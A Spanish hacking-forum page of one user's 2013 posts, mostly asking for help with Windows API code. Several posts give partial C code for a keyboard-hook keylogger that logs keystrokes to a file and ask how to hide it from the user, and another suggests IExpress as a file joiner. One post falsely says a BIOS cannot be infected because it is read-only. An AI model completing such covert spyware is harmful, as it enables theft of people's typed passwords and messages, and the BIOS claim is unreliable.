elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6
41  Comunicaciones / Redes / conectar cable red universidad en: 23 Noviembre 2013, 17:16 pm
Bunas,

La conexión inalámbrica de mi universidad funciona muy mal. Es extremadamente lenta y pierdes la conexión continuamente.

Es por eso que hay una aula de informatica para ir allí y trabajar desde esos pc's que estan conectados por LAN y su connexión funciona de maravilla.

Si cojo el cable de red de uno de esos pc's y lo enchufo al mio (exactamente como hago en casa), no funciona. Si lo hago en casa funciona pero ahí no. Será que tengo que configurar una nueva interfaz de red o entrarle yo manualmente la misma configuración de red que tiene el pc de la uni al que cojo el cable...

A ver si alguien me puede hechar una mano! gracias
42  Seguridad Informática / Análisis y Diseño de Malware / Re: [?] Un_Joiner en: 15 Agosto 2013, 17:14 pm
Oh si perdona, tienes razón. Leí demasiado rápido tu pregunta.
Lo que tu estas buscando es un splitter. Iexpress (si no recuerdo mal) solo incluye la funcion de joiner (juntar) pero no la de splitter (separar).

Si buscas por la red "splitter" o "splitter and joiner" encontraras lo que buscas

Salu2!
43  Seguridad Informática / Análisis y Diseño de Malware / Re: [?] Un_Joiner en: 14 Agosto 2013, 12:37 pm
Windows trae su propio joiner. Iexpress
inicio->ejecutar y escribe "Iexpress". Hay miles de tutoriales de éste joiner por internet

Salu2!
44  Seguridad Informática / Análisis y Diseño de Malware / Re: Crear un virus en la bios en: 11 Julio 2013, 10:03 am
La bios de un PC es una ROM, y como tal, no se puede infectar con ningún virus puesto que ROM = 'Read Only Memory' (no se puede escribir en ella). Como mucho, podria ocurrir que ejecutaras un virus en el Sistema Operativo que esté corriendo y en ése momento se dañe la BIOS. Aún así, no se puede infectar
45  Seguridad Informática / Hacking / Re: Keylogger en: 9 Julio 2013, 13:00 pm
Por internet hay infinidad de keyloggers que puedes descargarte. En el grado medio no te van a enseñar a programar keyloggers pero en el de grado superior tampoco.
Lo que te van a enseñar será a programar. A partir de ahí vas a tener que ser tú el que investigue un poco por ahí para ver como podrias programar un keylogger con el lenguaje que conozcas.

Suerte!
46  Seguridad Informática / Análisis y Diseño de Malware / Re: Keylogger en C (Windows Hooks) en: 8 Julio 2013, 13:31 pm
Lo que he hecho es utilizar GetMessage, transaltemessage y dispatchmessage de la siguiente forma. Supongo que es éso a lo que te refieres, aun asi, me sigue sin funcionar.

Código:

MSG msg;

HHOOK keyboardHook = SetWindowsHookEx (WH_KEYBOARD_LL, HookKey, hInstance, 0);

while(1){
  GetMessage(&msg, NULL, 0, 0);
  TranslateMessage(&msg);
  DispatchMessage(&msg);

Ésto compila correctamente y también se ejecuta. Aún así, ahora ya no me loggea los caracteres guardándolos en el fichero tal y como hacia antes cuando utilizaba el MessageBox().

47  Seguridad Informática / Análisis y Diseño de Malware / Keylogger en C (Windows Hooks) en: 6 Julio 2013, 18:36 pm
Buenas, he escrito un keylogger en C usando hooks y tengo un pequeño problema, a ver si alguien me puede ayudar.
Ésto es parte de la función principal (WinMain) de mi keylogger
Código:
f = fopen ("C:/KEYS.TXT", "a+");
if (f==NULL){
exit(0);
}

HHOOK keyboardHook = SetWindowsHookEx (WH_KEYBOARD_LL, HookKey, hInstance, 0);

MessageBox(NULL, L"Click to exit", L"Keylogger", NULL);

        UnhookWindowsHookEx(keyboardHook);
fclose(f);
return 0;

Tengo que utilizar MessageBox() porque necesito que el programa se ejecute infinitamente. Aún así, MessageBox() no es muy bueno para mi keylogger ya que muestra un mensaje por pantalla (como es lógico). Aún así, he estado buscando y no encuentro otra función (o líneas de código) que hagan que el hook permanezca siempre sin que el usuario se de cuenta.

Mi código compila y guarda todo lo que el usuario escribe en un fichero. Aún así, el problema es éste que describo, que mientras el keylogger se está ejecutando, se muestra por pantalla el cuadro de diálogo originado por MessageBox().

A ver si alguien tiene alguna idea.

Gracias! ;)
48  Programación / Programación General / Re: Programacion con API de Windows en: 3 Junio 2013, 17:13 pm
No, ésto no es lo que falta pues coge un valor por defecto. Es más, si le pongo el int nCmdShow sigue fallando y me da el mismo error... :S

Alguna otra idea? Gracias!
49  Programación / Programación General / Programacion con API de Windows en: 3 Junio 2013, 15:48 pm
Código:
Buenas! Estoy programando algo usando la API de windows pero me tira siempre un error. El trozo de codigo que falla és la llamada a la funcion WinMain:
code]int WINAPI WinMain(HINSTANCE hinstExe, HINSTANCE, PTSTR pszCmdLine, int)

El error que me sale es:
Código:
error C2731 'WinMain': no se puede sobrecargar la función

He estado buscando sobre éste error y no consigo ver donde estoy fallando. Me extraña porque en ejemplos de por ahí, hacen la llamada a WinMain igual que yo....


Gracias!
50  Seguridad Informática / Análisis y Diseño de Malware / Re: Keylogger en C en: 2 Junio 2013, 14:36 pm
Nadie??? Venga una ayuditaa.... básicamente con eso de que mi keylogger solo guarda al archivo cuando no cambio de ventana activa.

Gracias
Páginas: 1 2 3 4 [5] 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines